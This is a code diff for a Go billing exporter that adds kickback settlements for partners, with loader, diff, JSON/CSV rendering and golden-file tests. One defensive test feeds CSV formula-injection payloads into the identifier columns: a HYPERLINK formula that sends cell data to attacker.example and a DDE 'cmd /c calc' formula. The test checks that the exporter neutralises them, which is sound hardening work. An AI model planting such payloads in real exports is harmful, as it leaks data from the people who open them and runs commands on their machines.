+// reads out of a run: its row and the kickbacks it settles, and none of the
+// statements, rated records and deltas a full export renders. The same run is
+// read both ways, so the three empty lists are an omission rather than an empty
+// database: a month of rated records is tens of thousands of rows with a usage
+// object each, and the report renders none of them.
+func TestLoadKickbacksReadsTheSettlementAlone(t *testing.T) {
+	db := storetest.NewDB(t)
+	pool := db.Store.Pool()
+
+	corrected := seedCompletedRun(t, db)
+	seedAdjustmentRecord(t, db, corrected, relation1, statementKey, "partner-corp",
+		"kickback", "all", "0.100000", "126.48", "12.65")
+	// The month is closed after its rows are written: the records of a finalized
+	// run are immutable, and the trigger refuses an insert under one.
+	finalizeRun(t, db, corrected)
+
+	correction := seedCorrectionRun(t, db, corrected)
+	seedStatement(t, db, correction, statementKey, []byte(`{"project_id": "proj-456"}`), "106.08")
+	usageID := seedUsage(t, db, correction, usageSeed{
+		cloud: instance.Cloud, resourceID: instance.ResourceID, projectID: projectID,
+		state: "active", from: periodFrom, to: periodTo, usage: `{"vcpus": 4}`,
+	})
+	seedRated(t, db, correction, usageID, "vcpus", "106.08")
+	seedDelta(t, db, correction, corrected, deltaSeed{
+		cloud: instance.Cloud, resourceID: instance.ResourceID, projectID: projectID,
+		dimension: "vcpus", old: "126.48", current: "106.08", difference: "-20.40",
+	})
+	seedAdjustmentRecord(t, db, correction, relation1, statementKey, "partner-corp",
+		"kickback", "all", "0.100000", "106.08", "10.61")
+
+	full := load(t, db, correction)
+	if len(full.Statements) != 1 || len(full.Rated) != 1 || len(full.Deltas) != 1 {
+		t.Fatalf("Load() read %d statements, %d rated records and %d deltas, want one of each",
+			len(full.Statements), len(full.Rated), len(full.Deltas))
+	}
+
+	run, err := export.LoadKickbacks(t.Context(), pool, correction)
+	if err != nil {
+		t.Fatalf("LoadKickbacks() error = %v, want nil", err)
+	}
+	if run.ID != correction || run.Kind != runs.KindCorrection || run.CorrectsRunID != corrected {
+		t.Errorf("the run is %s, a %s correcting %s, want the correction %s of %s",
+			run.ID, run.Kind, run.CorrectsRunID, correction, corrected)
+	}
+	if len(run.Statements) != 0 || len(run.Rated) != 0 || len(run.Deltas) != 0 {
+		t.Errorf("the settlement read %d statements, %d rated records and %d deltas, want none of them",
+			len(run.Statements), len(run.Rated), len(run.Deltas))
+	}
+
+	got := kickbackRows(run.Kickbacks)
+	want := kickbackRows([]export.Kickback{
+		kickback("partner-corp", "os-prod", projectID, relation1, "all", "0.100000", "-20.40", "-2.04"),
+	})
+	if !reflect.DeepEqual(got, want) {
+		t.Errorf("the kickbacks are %v, want %v", got, want)
+	}
+
+	t.Run("a run that is not exportable", func(t *testing.T) {
+		// The narrowed read refuses what the full one refuses: a superseded run
+		// bills nobody, and a settlement rendered from one names a payout no
+		// partner is owed.
+		runID := seedRun(t, db, runSeed{kind: runs.KindRegular, status: "superseded"})
+
+		_, err := export.LoadKickbacks(t.Context(), pool, runID)
+		if !errors.Is(err, export.ErrRunNotExportable) {
+			t.Fatalf("LoadKickbacks() error = %v, want one matching ErrRunNotExportable", err)
+		}
+	})
+}
+
 // TestLoadCarriesAStoredDocumentThroughJSONB pins the round trip a statement
 // takes. It is stored in a jsonb column, which parses the document and hands it
 // back in its own key order and spacing, and what an ERP receives has to be the

--- a/internal/engine/export/export_test.go
+++ b/internal/engine/export/export_test.go
@@ -93,7 +93,7 @@ const drDocument = `{"billing_period":{"from":"2026-03-01T00:00:00Z","to":"2026-
 	`"usage":{"disk_gb":200.0000},"cost":{"disk_gb":22.32,"total":22.32},"state_modifier":1.0000}],` +
 	`"total":22.32}],"related_costs":[],"total":22.32,"currency":"EUR"}`
 
-// The two header rows, spelled out here rather than read off the writers: the
+// The three header rows, spelled out here rather than read off the writers: the
 // column order is what an ERP's import mapping is written against, so a case
 // states it rather than agreeing with whatever the code emits.
 const (
@@ -101,6 +101,8 @@ const (
 		"resource_type,resource_id,project_id,state,from_ts,to_ts,dimension,quantity,amount,currency"
 	deltasHeader = "run_id,corrects_run_id,period_from,period_to,cloud,platform," +
 		"resource_type,resource_id,project_id,dimension,old_amount,new_amount,delta,currency"
+	kickbacksHeader = "run_id,kind,corrects_run_id,period_from,period_to,beneficiary,cloud," +
+		"project_id,relation_id,scope,rate,base,amount,currency"
 )
 
 // The file names the two writers produce over the fixtures.
@@ -260,6 +262,46 @@ func kickback(beneficiary, cloud, projectID string, relationID uuid.UUID,
 		Base:         decimal.RequireFromString(base),
 		Amount:       decimal.RequireFromString(amount),
 	}
+}
+
+// kickbackRun is the March run above with a settlement under it: what
+// partner-corp is owed off three projects in two clouds, over four relations
+// and two scopes, and what partner-two is owed off one project. Two partners
+// and two clouds are what the grouping is read over: a report that summed one
+// partner's projects into the other's, or one that dropped the cloud from the
+// pair, bills somebody else's payout to the partner.
+func kickbackRun(t *testing.T) export.Run {
+	t.Helper()
+
+	run := regularRun(t)
+	run.Kickbacks = []export.Kickback{
+		kickback("partner-corp", "os-dr", "customer-proj-1", relation3, "openstack.instance",
+			"0.05", "200.00", "10.00"),
+		kickback("partner-corp", "os-prod", "customer-proj-1", relation1, "all",
+			"0.10", "1020.00", "102.00"),
+		kickback("partner-corp", "os-prod", "customer-proj-2", relation2, "all",
+			"0.10", "500.00", "50.00"),
+		kickback("partner-corp", "os-prod", "customer-proj-2", relation5, "openstack.volume",
+			"0.10", "100.00", "10.00"),
+		kickback("partner-two", "os-prod", "customer-proj-2", relation4, "all",
+			"0.02", "500.00", "10.00"),
+	}
+	return run
+}
+
+// kickbackCorrectionRun is the correction of that month: the two differences it
+// owes back, both negative, because the correction re-rated the usage down.
+func kickbackCorrectionRun(t *testing.T) export.Run {
+	t.Helper()
+
+	run := correctionRun(t)
+	run.Kickbacks = []export.Kickback{
+		kickback("partner-corp", "os-prod", "customer-proj-1", relation1, "all",
+			"0.10", "-20.40", "-2.04"),
+		kickback("partner-corp", "os-prod", "customer-proj-2", relation2, "all",
+			"0.10", "-500.00", "-50.00"),
+	}
+	return run
 }
 
 // kickbackRow is one kickback as a case compares it: every column, at the scale
@@ -1186,6 +1228,201 @@ func TestDiffKickbacks(t *testing.T) {
 	}
 }
 
+// TestKickbacksGolden pins the bytes both renderers produce, over a settlement
+// and over the correction of one. The document is what a partner is paid
+// against, so a change to a member, a column, an order or a scale is a change
+// to somebody's payout: it has to show up here rather than in their next
+// remittance.
+func TestKickbacksGolden(t *testing.T) {
+	cases := []struct {
+		name   string
+		render func(run export.Run) ([]byte, error)
+		run    func(t *testing.T) export.Run
+		golden string
+	}{
+		{
+			name:   "the document of a settlement",
+			render: export.KickbacksJSON,
+			run:    kickbackRun,
+			golden: "regular.json",
+		},
+		{
+			name:   "the table of a settlement",
+			render: export.KickbacksCSV,
+			run:    kickbackRun,
+			golden: "regular.csv",
+		},
+		{
+			name:   "the document of a correction",
+			render: export.KickbacksJSON,
+			run:    kickbackCorrectionRun,
+			golden: "correction.json",
+		},
+		{
+			name:   "the table of a correction",
+			render: export.KickbacksCSV,
+			run:    kickbackCorrectionRun,
+			golden: "correction.csv",
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.name, func(t *testing.T) {
+			got, err := c.render(c.run(t))
+			if err != nil {
+				t.Fatalf("rendering the settlement: %v", err)
+			}
+			want := read(t, filepath.Join("testdata", "golden", "kickbacks", c.golden))
+			if !bytes.Equal(got, want) {
+				t.Errorf("%s =\n%s\nwant\n%s", c.golden, got, want)
+			}
+		})
+	}
+}
+
+// TestKickbacksJSONWithoutKickbacks pins what a run that owes nobody renders: a
+// beneficiary list that is empty rather than null. An empty list is one a
+// partner's importer iterates over without a case for the missing value.
+func TestKickbacksJSONWithoutKickbacks(t *testing.T) {
+	cases := []struct {
+		name string
+		run  func(t *testing.T) export.Run
+	}{
+		{name: "a run that settled nothing", run: regularRun},
+		{
+			name: "a run whose settlement is nil",
+			run: func(t *testing.T) export.Run {
+				run := kickbackRun(t)
+				run.Kickbacks = nil
+				return run
+			},
+		},
+		{
+			name: "a run whose settlement is empty",
+			run: func(t *testing.T) export.Run {
+				run := kickbackRun(t)
+				run.Kickbacks = []export.Kickback{}
+				return run
+			},
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.name, func(t *testing.T) {
+			body, err := export.KickbacksJSON(c.run(t))
+			if err != nil {
+				t.Fatalf("KickbacksJSON() error = %v, want nil", err)
+			}
+			if want := `"beneficiaries": []`; !strings.Contains(string(body), want) {
+				t.Errorf("KickbacksJSON() =\n%s\nwant it to carry %s", body, want)
+			}
+		})
+	}
+}
+
+// TestKickbacksCSVWithoutRows pins the header-only table, for the reason
+// TestCSVFilesWithoutRows pins the other two.
+func TestKickbacksCSVWithoutRows(t *testing.T) {
+	body, err := export.KickbacksCSV(regularRun(t))
+	if err != nil {
+		t.Fatalf("KickbacksCSV() error = %v, want nil", err)
+	}
+	if got, want := string(body), kickbacksHeader+"\n"; got != want {
+		t.Errorf("KickbacksCSV() = %q, want %q", got, want)
+	}
+}
+
+// TestKickbacksRenderInOneOrder pins that the bytes are a function of what the
+// run settles rather than of the order the kickbacks were handed over in. The
+// loader orders them, and a report a partner reconciles against the month
+// before it has to read the same either way.
+func TestKickbacksRenderInOneOrder(t *testing.T) {
+	cases := []struct {
+		name   string
+		render func(run export.Run) ([]byte, error)
+	}{
+		{name: "the document", render: export.KickbacksJSON},
+		{name: "the table", render: export.KickbacksCSV},
+	}
+
+	for _, c := range cases {
+		t.Run(c.name, func(t *testing.T) {
+			want, err := c.render(kickbackRun(t))
+			if err != nil {
+				t.Fatalf("rendering the settlement: %v", err)
+			}
+			reversed := kickbackRun(t)
+			slices.Reverse(reversed.Kickbacks)
+
+			got, err := c.render(reversed)
+			if err != nil {
+				t.Fatalf("rendering the reversed settlement: %v", err)
+			}
+			if !bytes.Equal(got, want) {
+				t.Errorf("the reversed settlement renders\n%s\nwant\n%s", got, want)
+			}
+		})
+	}
+}
+
+// TestKickbacksCSVRefusesAFormulaToTheSpreadsheet pins the identifier columns
+// of the settlement table, for the reason the rated.csv case above pins its
+// own. A beneficiary and a scope come out of an adjustments document, a cloud
+// and a project id out of an event stream, and this table is the one whoever
+// pays the partners opens in a spreadsheet.
+func TestKickbacksCSVRefusesAFormulaToTheSpreadsheet(t *testing.T) {
+	const (
+		formula  = `=HYPERLINK("http://attacker.example/"&A1,"invoice")`
+		command  = `@SUM(1+9)*cmd|' /c calc'!A1`
+		plus     = "+1+1"
+		minus    = "-1+1"
+		tabbed   = "\t=1+1"
+		returned = "\r=1+1"
+	)
+
+	cases := []struct {
+		name   string
+		column int
+		set    func(kickback *export.Kickback, value string)
+	}{
+		{name: "beneficiary", column: 5, set: func(k *export.Kickback, v string) { k.Beneficiary = v }},
+		{name: "cloud", column: 6, set: func(k *export.Kickback, v string) { k.Cloud = v }},
+		{name: "project_id", column: 7, set: func(k *export.Kickback, v string) { k.ProjectID = v }},
+		{name: "scope", column: 9, set: func(k *export.Kickback, v string) { k.Scope = v }},
+	}
+
+	for _, c := range cases {
+		for _, value := range []string{formula, command, plus, minus, tabbed, returned} {
+			t.Run(c.name+" holding "+value, func(t *testing.T) {
+				run := kickbackRun(t)
+				entry := run.Kickbacks[0]
+				c.set(&entry, value)
+				run.Kickbacks = []export.Kickback{entry}
+
+				rows := kickbackTable(t, run)
+				if len(rows) != 2 {
+					t.Fatalf("the table holds %d rows, want the header and one kickback", len(rows))
+				}
+				// The value reaches an importer whole, under the prefix that keeps a
+				// spreadsheet from evaluating it.
+				if got, want := rows[1][c.column], "'"+value; got != want {
+					t.Errorf("%s = %q, want %q", c.name, got, want)
+				}
+			})
+		}
+	}
+
+	t.Run("the amount a correction takes back keeps its minus", func(t *testing.T) {
+		rows := kickbackTable(t, kickbackCorrectionRun(t))
+		// Column twelve is amount, on the first row the order returns, which is the
+		// difference over customer-proj-1. It is a number, so it does not go
+		// through the prefix: a leading minus there is what the partner owes back.
+		if got, want := rows[1][12], "-2.04"; got != want {
+			t.Errorf("amount = %q, want %q", got, want)
+		}
+	})
+}
+
 // jsonFiles and csvFiles are the two writers over one directory, as the cases
 // hand them around.
 func jsonFiles(dir string) export.BillingExporter { return export.JSONFiles{Dir: dir} }
@@ -1270,6 +1507,22 @@ func readCSV(t *testing.T, path string) [][]string {
 	rows, err := csv.NewReader(bytes.NewReader(read(t, path))).ReadAll()
 	if err != nil {
 		t.Fatalf("reading %s back: %v", path, err)
+	}
+	return rows
+}
+
+// kickbackTable is one rendered settlement, parsed: the header row and the rows
+// under it, the way readCSV parses a written one.
+func kickbackTable(t *testing.T, run export.Run) [][]string {
+	t.Helper()
+
+	body, err := export.KickbacksCSV(run)
+	if err != nil {
+		t.Fatalf("KickbacksCSV() error = %v, want nil", err)
+	}
+	rows, err := csv.NewReader(bytes.NewReader(body)).ReadAll()
+	if err != nil {
+		t.Fatalf("reading the settlement back: %v", err)
 	}
 	return rows
 }

--- a/internal/engine/export/export_test.go
+++ b/internal/engine/export/export_test.go
@@ -112,6 +112,9 @@ const (
 	creditNoteFile = "credit-note-os-prod%2Fproj-456.json"
 	ratedFile      = "rated.csv"
 	deltasFile     = "deltas.csv"
+
+	kickbacksJSONFile = "kickbacks.json"
+	kickbacksCSVFile  = "kickbacks.csv"
 )
 
 // regularRun is the finalized run of the concept's power-cycle month: the
@@ -361,28 +364,28 @@ func TestExportGolden(t *testing.T) {
 			writer: jsonFiles,
 			run:    regularRun,
 			golden: "regular",
-			files:  []string{runFile, drStatementFile, statementFile},
+			files:  []string{runFile, drStatementFile, statementFile, kickbacksJSONFile},
 		},
 		{
 			name:   "the CSV writer over a regular run",
 			writer: csvFiles,
 			run:    regularRun,
 			golden: "regular",
-			files:  []string{ratedFile},
+			files:  []string{ratedFile, kickbacksCSVFile},
 		},
 		{
 			name:   "the JSON writer over a correction",
 			writer: jsonFiles,
 			run:    correctionRun,
 			golden: "correction",
-			files:  []string{runFile, creditNoteFile},
+			files:  []string{runFile, creditNoteFile, kickbacksJSONFile},
 		},
 		{
 			name:   "the CSV writer over a correction",
 			writer: csvFiles,
 			run:    correctionRun,
 			golden: "correction",
-			files:  []string{ratedFile, deltasFile},
+			files:  []string{ratedFile, deltasFile, kickbacksCSVFile},
 		},
 	}
 
@@ -410,9 +413,12 @@ func TestExportReplacesAnEarlierExport(t *testing.T) {
 	}{
 		{
 			name: "the JSON writer", writer: jsonFiles, stale: runFile,
-			files: []string{runFile, drStatementFile, statementFile},
+			files: []string{runFile, drStatementFile, statementFile, kickbacksJSONFile},
 		},
-		{name: "the CSV writer", writer: csvFiles, stale: ratedFile, files: []string{ratedFile}},
+		{
+			name: "the CSV writer", writer: csvFiles, stale: ratedFile,
+			files: []string{ratedFile, kickbacksCSVFile},
+		},
 	}
 
 	for _, c := range cases {
@@ -448,9 +454,9 @@ func TestExportReplacesAnEarlierExport(t *testing.T) {
 }
 
 // TestJSONFilesWithoutStatements pins what a run that billed nobody exports: a
-// run.json whose statement list is empty rather than null, and no document
-// beside it. An empty list is one an importer iterates over without a case for
-// the missing value.
+// run.json whose statement list is empty rather than null, with the settlement
+// beside it and no document. An empty list is one an importer iterates over
+// without a case for the missing value.
 func TestJSONFilesWithoutStatements(t *testing.T) {
 	dir := t.TempDir()
 	run := regularRun(t)
@@ -460,7 +466,7 @@ func TestJSONFilesWithoutStatements(t *testing.T) {
 		t.Fatalf("Export() error = %v, want nil", err)
 	}
 
-	assertNames(t, dir, []string{runFile})
+	assertNames(t, dir, []string{runFile, kickbacksJSONFile})
 	if body := string(read(t, filepath.Join(dir, runFile))); !strings.Contains(body, `"statements": []`) {
 		t.Errorf("%s =\n%s\nwant an empty statement list", runFile, body)
 	}
@@ -480,7 +486,7 @@ func TestCSVFilesWithoutRows(t *testing.T) {
 			t.Fatalf("Export() error = %v, want nil", err)
 		}
 
-		assertNames(t, dir, []string{ratedFile})
+		assertNames(t, dir, []string{ratedFile, kickbacksCSVFile})
 		if got, want := string(read(t, filepath.Join(dir, ratedFile))), ratedHeader+"\n"; got != want {
 			t.Errorf("%s = %q, want %q", ratedFile, got, want)
 		}
@@ -495,7 +501,7 @@ func TestCSVFilesWithoutRows(t *testing.T) {
 			t.Fatalf("Export() error = %v, want nil", err)
 		}
 
-		assertNames(t, dir, []string{deltasFile, ratedFile})
+		assertNames(t, dir, []string{deltasFile, kickbacksCSVFile, ratedFile})
 		if got, want := string(read(t, filepath.Join(dir, deltasFile))), deltasHeader+"\n"; got != want {
 			t.Errorf("%s = %q, want %q", deltasFile, got, want)
 		}
@@ -701,7 +707,7 @@ func TestJSONFilesNamesTwoStatementsOneFileSystemHoldsAsOneApart(t *testing.T) {
 	// Both documents are in the directory, and each of them is attributed by the
 	// index rather than by its name: a digest-named document bills the project
 	// run.json names beside it.
-	assertNames(t, dir, []string{runFile, first.File, second.File})
+	assertNames(t, dir, []string{runFile, kickbacksJSONFile, first.File, second.File})
 	for i, want := range []struct{ projectID, total string }{
 		{projectID: "Proj-A", total: "1.00"},
 		{projectID: "proj-a", total: "2.00"},
@@ -774,6 +780,20 @@ func TestExportRemovesWhatItWroteWhenAWriteFails(t *testing.T) {
 			run:     correctionRun,
 			blocked: deltasFile,
 			removed: ratedFile,
+		},
+		{
+			name:    "the JSON writer over a settlement that fails",
+			writer:  jsonFiles,
+			run:     regularRun,
+			blocked: kickbacksJSONFile,
+			removed: statementFile,
+		},
+		{
+			name:    "the CSV writer over a settlement that fails",
+			writer:  csvFiles,
+			run:     correctionRun,
+			blocked: kickbacksCSVFile,
+			removed: deltasFile,
 		},
 	}
 
@@ -941,8 +961,8 @@ func TestJSONFilesWritesAnIdentifierNoFileNameHolds(t *testing.T) {
 	}
 
 	files := names(t, dir)
-	if len(files) != 2 {
-		t.Fatalf("the directory holds %v, want run.json and the one document", files)
+	if len(files) != 3 {
+		t.Fatalf("the directory holds %v, want run.json, kickbacks.json and the one document", files)
 	}
 	var index struct {
 		Statements []struct {

--- a/internal/engine/export/export_test.go
+++ b/internal/engine/export/export_test.go
@@ -9,6 +9,7 @@ import (
 	"maps"
 	"os"
 	"path/filepath"
+	"reflect"
 	"slices"
 	"strings"
 	"syscall"
@@ -32,6 +33,18 @@ import (
 var (
 	regularRunID    = uuid.MustParse("3f1e6a58-9c24-4d0b-8f77-2a5c1b93e0d4")
 	correctionRunID = uuid.MustParse("4b9d2c17-6e85-4f3a-8a01-c5d4e6f7a8b9")
+)
+
+// The relations the kickback cases settle under. A kickback is keyed by the
+// relation it came from, so the ids are written out rather than generated: a
+// case names which relation a difference belongs to, and the diff orders them
+// by their bytes.
+var (
+	relation1 = uuid.MustParse("11111111-1111-1111-1111-111111111111")
+	relation2 = uuid.MustParse("22222222-2222-2222-2222-222222222222")
+	relation3 = uuid.MustParse("33333333-3333-3333-3333-333333333333")
+	relation4 = uuid.MustParse("44444444-4444-4444-4444-444444444444")
+	relation5 = uuid.MustParse("55555555-5555-5555-5555-555555555555")
 )
 
 // The month both runs bill, and the two instants the instance was powered off
@@ -227,6 +240,54 @@ func delta(dimension, old, current, difference string) export.Delta {
 		},
 		Currency: currency,
 	}
+}
+
+// kickback is one settled kickback, as the cases hand them around. The
+// statement key is rendered from the pair rather than passed beside it, which
+// is what the diff groups by.
+func kickback(beneficiary, cloud, projectID string, relationID uuid.UUID,
+	scope, rate, base, amount string,
+) export.Kickback {
+	return export.Kickback{
+		Beneficiary:  beneficiary,
+		Currency:     currency,
+		StatementKey: statements.Key(cloud, projectID),
+		Cloud:        cloud,
+		ProjectID:    projectID,
+		RelationID:   relationID,
+		Scope:        scope,
+		Rate:         decimal.RequireFromString(rate),
+		Base:         decimal.RequireFromString(base),
+		Amount:       decimal.RequireFromString(amount),
+	}
+}
+
+// kickbackRow is one kickback as a case compares it: every column, at the scale
+// it is stored at. Two decimals that are the same number are not the same
+// decimal.Decimal, so the comparison is over what they render as.
+type kickbackRow struct {
+	beneficiary, cloud, projectID, relation, scope string
+	rate, base, amount, currency                   string
+}
+
+// kickbackRows renders what a load or a diff returned, in the order it came
+// back in.
+func kickbackRows(kickbacks []export.Kickback) []kickbackRow {
+	rows := make([]kickbackRow, 0, len(kickbacks))
+	for _, entry := range kickbacks {
+		rows = append(rows, kickbackRow{
+			beneficiary: entry.Beneficiary,
+			cloud:       entry.Cloud,
+			projectID:   entry.ProjectID,
+			relation:    entry.RelationID.String(),
+			scope:       entry.Scope,
+			rate:        entry.Rate.StringFixed(6),
+			base:        entry.Base.StringFixed(2),
+			amount:      entry.Amount.StringFixed(2),
+			currency:    entry.Currency,
+		})
+	}
+	return rows
 }
 
 // fixture reads a document another package's golden holds, so the bytes an
@@ -995,6 +1056,131 @@ func TestExportModes(t *testing.T) {
 			}
 			for _, file := range files {
 				assertMode(t, filepath.Join(dir, file), 0o600)
+			}
+		})
+	}
+}
+
+// TestDiffKickbacks pins what a correction settles for a partner. A partner is
+// paid on the finalized month and again on its correction, so what the
+// correction owes is the difference to what the corrected run already settled,
+// under the key the credit note is diffed by: a kickback the correction dropped
+// takes the whole payout back, one it settles for the first time is owed whole,
+// and one it re-stated unchanged is owed nothing.
+func TestDiffKickbacks(t *testing.T) {
+	cases := []struct {
+		name         string
+		old, current []export.Kickback
+		want         []export.Kickback
+	}{
+		{
+			name: "a kickback that changed, one that is gone and one that is new",
+			old: []export.Kickback{
+				kickback("partner-corp", "os-prod", projectID, relation1, "all", "0.100000", "126.48", "12.65"),
+				kickback("partner-corp", "os-prod", projectID, relation2, "all", "0.100000", "50.00", "5.00"),
+			},
+			current: []export.Kickback{
+				kickback("partner-corp", "os-prod", projectID, relation1, "all", "0.100000", "106.08", "10.61"),
+				kickback("partner-corp", "os-prod", projectID, relation3, "all", "0.100000", "30.00", "3.00"),
+			},
+			want: []export.Kickback{
+				kickback("partner-corp", "os-prod", projectID, relation1, "all", "0.100000", "-20.40", "-2.04"),
+				kickback("partner-corp", "os-prod", projectID, relation2, "all", "0.100000", "-50.00", "-5.00"),
+				kickback("partner-corp", "os-prod", projectID, relation3, "all", "0.100000", "30.00", "3.00"),
+			},
+		},
+		{
+			name: "two elements under one key are summed before the difference",
+			old: []export.Kickback{
+				kickback("partner-corp", "os-prod", projectID, relation1, "all", "0.100000", "126.48", "12.65"),
+			},
+			current: []export.Kickback{
+				kickback("partner-corp", "os-prod", projectID, relation1, "all", "0.100000", "60.00", "6.00"),
+				kickback("partner-corp", "os-prod", projectID, relation1, "all", "0.100000", "46.08", "4.61"),
+			},
+			want: []export.Kickback{
+				kickback("partner-corp", "os-prod", projectID, relation1, "all", "0.100000", "-20.40", "-2.04"),
+			},
+		},
+		{
+			name: "a base that moved under an amount that did not",
+			old: []export.Kickback{
+				kickback("partner-corp", "os-prod", projectID, relation1, "all", "0.100000", "100.00", "10.00"),
+				kickback("partner-corp", "os-prod", projectID, relation2, "all", "0.100000", "50.00", "5.00"),
+			},
+			current: []export.Kickback{
+				kickback("partner-corp", "os-prod", projectID, relation1, "all", "0.100000", "100.04", "10.00"),
+				kickback("partner-corp", "os-prod", projectID, relation2, "all", "0.100000", "60.00", "6.00"),
+			},
+			want: []export.Kickback{
+				kickback("partner-corp", "os-prod", projectID, relation2, "all", "0.100000", "10.00", "1.00"),
+			},
+		},
+		{
+			name: "the partner and the project come from the side the key was read off",
+			old: []export.Kickback{
+				kickback("partner-old", "os-prod", projectID, relation1, "all", "0.100000", "100.00", "10.00"),
+				kickback("partner-gone", "os-dr", "proj-789", relation2, "all", "0.050000", "20.00", "1.00"),
+			},
+			current: []export.Kickback{
+				kickback("partner-new", "os-prod", projectID, relation1, "all", "0.100000", "150.00", "15.00"),
+			},
+			want: []export.Kickback{
+				kickback("partner-gone", "os-dr", "proj-789", relation2, "all", "0.050000", "-20.00", "-1.00"),
+				kickback("partner-new", "os-prod", projectID, relation1, "all", "0.100000", "50.00", "5.00"),
+			},
+		},
+		{
+			name: "two sides that settle the same",
+			old: []export.Kickback{
+				kickback("partner-corp", "os-prod", projectID, relation1, "all", "0.100000", "126.48", "12.65"),
+			},
+			current: []export.Kickback{
+				kickback("partner-corp", "os-prod", projectID, relation1, "all", "0.100000", "126.48", "12.65"),
+			},
+		},
+		{name: "two sides that settle nothing"},
+		{
+			// Fed in the reverse of the order they come back in, over every column
+			// the order reads: the partner, the statement, the relation, the scope
+			// and the rate. No two of them agree on the amount either, so a column
+			// the order dropped hands them back in another order rather than in
+			// this one by luck.
+			name: "a settlement over two partners and six keys",
+			current: []export.Kickback{
+				kickback("partner-two", "os-prod", projectID, relation1, "all", "0.020000", "500.00", "10.00"),
+				kickback("partner-corp", "os-prod", projectID, relation2, "all", "0.100000", "50.00", "5.00"),
+				kickback("partner-corp", "os-prod", projectID, relation1, "openstack.instance",
+					"0.200000", "10.00", "2.00"),
+				kickback("partner-corp", "os-prod", projectID, relation1, "openstack.instance",
+					"0.100000", "50.00", "5.00"),
+				kickback("partner-corp", "os-prod", projectID, relation1, "all", "0.100000", "100.00", "10.00"),
+				kickback("partner-corp", "os-dr", projectID, relation1, "all", "0.100000", "300.00", "30.00"),
+			},
+			want: []export.Kickback{
+				kickback("partner-corp", "os-dr", projectID, relation1, "all", "0.100000", "300.00", "30.00"),
+				kickback("partner-corp", "os-prod", projectID, relation1, "all", "0.100000", "100.00", "10.00"),
+				kickback("partner-corp", "os-prod", projectID, relation1, "openstack.instance",
+					"0.100000", "50.00", "5.00"),
+				kickback("partner-corp", "os-prod", projectID, relation1, "openstack.instance",
+					"0.200000", "10.00", "2.00"),
+				kickback("partner-corp", "os-prod", projectID, relation2, "all", "0.100000", "50.00", "5.00"),
+				kickback("partner-two", "os-prod", projectID, relation1, "all", "0.020000", "500.00", "10.00"),
+			},
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.name, func(t *testing.T) {
+			got := export.DiffKickbacks(c.old, c.current)
+			// Two sides that agree yield nil rather than an empty slice, which is
+			// what a report iterates over without a case for the missing value.
+			if len(c.want) == 0 && got != nil {
+				t.Fatalf("DiffKickbacks() = %v, want nil", got)
+			}
+			rows, want := kickbackRows(got), kickbackRows(c.want)
+			if !reflect.DeepEqual(rows, want) {
+				t.Errorf("DiffKickbacks() = %v, want %v", rows, want)
 			}
 		})
 	}

--- a/internal/engine/export/json.go
+++ b/internal/engine/export/json.go
@@ -42,9 +42,11 @@ const (
 const nameMaxLen = 200
 
 // JSONFiles writes a run as JSON files into a directory: one document per
-// statement, and run.json, which names the run, the pricing version it rated
-// with, its stats, and one entry per document beside the file it was written
-// to. It is the file implementation of BillingExporter.
+// statement, run.json, which names the run, the pricing version it rated with,
+// its stats, and one entry per document beside the file it was written to, and
+// kickbacks.json, what the run settles for its partners. The settlement is
+// written for every run and carries an empty beneficiary list where the run
+// owes nobody. It is the file implementation of BillingExporter.
 type JSONFiles struct {
 	// Dir is where the files are written. It is created, with every parent it
 	// needs, when the export has rendered everything.
@@ -130,15 +132,17 @@ type statementEntry struct {
 	Currency  string       `json:"currency"`
 }
 
-// Export writes the run's documents and its index into Dir. Everything is
-// rendered before the directory is touched, so a statement whose key or whose
-// stored document is refused leaves no directory and no file behind, and a
-// write that fails takes the documents before it with it: an export that
-// reports an error wrote nothing, rather than every document up to the bad one.
+// Export writes the run's documents, its settlement and its index into Dir.
+// Everything is rendered before the directory is touched, so a statement whose
+// key or whose stored document is refused leaves no directory and no file
+// behind, and a write that fails takes the documents before it with it: an
+// export that reports an error wrote nothing, rather than every document up to
+// the bad one.
 //
-// run.json is written last, after every document it names is on stable storage,
-// so a reader that picks the index up finds every file it points at, on a node
-// that came back from a power loss as well as on one that did not.
+// run.json is written last, after every document it names and the settlement
+// beside them are on stable storage, so a reader that picks the index up finds
+// every file it points at and kickbacks.json next to them, on a node that came
+// back from a power loss as well as on one that did not.
 //
 // The context is not read. What is left is writing a few files, which is not
 // cancelable, and stopping halfway through would leave the directory holding
@@ -206,6 +210,11 @@ func (j JSONFiles) Export(_ context.Context, run Run) error {
 		})
 	}
 
+	kickbacks, err := KickbacksJSON(run)
+	if err != nil {
+		return err
+	}
+
 	body, err := marshal(index)
 	if err != nil {
 		return fmt.Errorf("rendering %s of run %s: %w", runFileName, run.ID, err)
@@ -214,10 +223,15 @@ func (j JSONFiles) Export(_ context.Context, run Run) error {
 	if err := prepareDir(j.Dir); err != nil {
 		return err
 	}
-	files := make([]artifact, 0, len(index.Statements))
+	files := make([]artifact, 0, len(index.Statements)+1)
 	for _, entry := range index.Statements {
 		files = append(files, artifact{name: entry.File, body: documents[entry.File]})
 	}
+	// The settlement goes in with the documents rather than after the index, so
+	// it is on stable storage before run.json names the month. No document takes
+	// its name away from it: DocumentFileName prefixes every one of them with
+	// statement- or credit-note-.
+	files = append(files, artifact{name: kickbacksJSONFileName, body: kickbacks})
 	return writeIndexedFiles(j.Dir, files, artifact{name: runFileName, body: body})
 }
 

--- a/internal/engine/export/kickbacks.go
+++ b/internal/engine/export/kickbacks.go
@@ -1,0 +1,246 @@
+package export
+
+import (
+	"bytes"
+	"cmp"
+	"context"
+	"fmt"
+	"slices"
+
+	"github.com/google/uuid"
+	"github.com/jackc/pgx/v5/pgtype"
+	"github.com/shopspring/decimal"
+
+	"github.com/b42labs/tally/internal/core/adjustment"
+	"github.com/b42labs/tally/internal/core/money"
+	"github.com/b42labs/tally/internal/engine/runs"
+	"github.com/b42labs/tally/internal/engine/statements"
+	"github.com/b42labs/tally/internal/engine/store/sqlcgen"
+)
+
+// Kickback is one kickback a run settles for a partner. For a regular run it
+// is one adjustment_records row of type kickback. For a correction it is one
+// non-zero difference between the correction's kickback records and those of
+// the run it corrects, under the key the credit note diffs by: Base and
+// Amount are then new minus old, negative where usage was corrected down.
+type Kickback struct {
+	Beneficiary string // the partner's external id, adjustment_records.beneficiary
+	Currency    string
+	// StatementKey is adjustment_records.project_id as stored, the
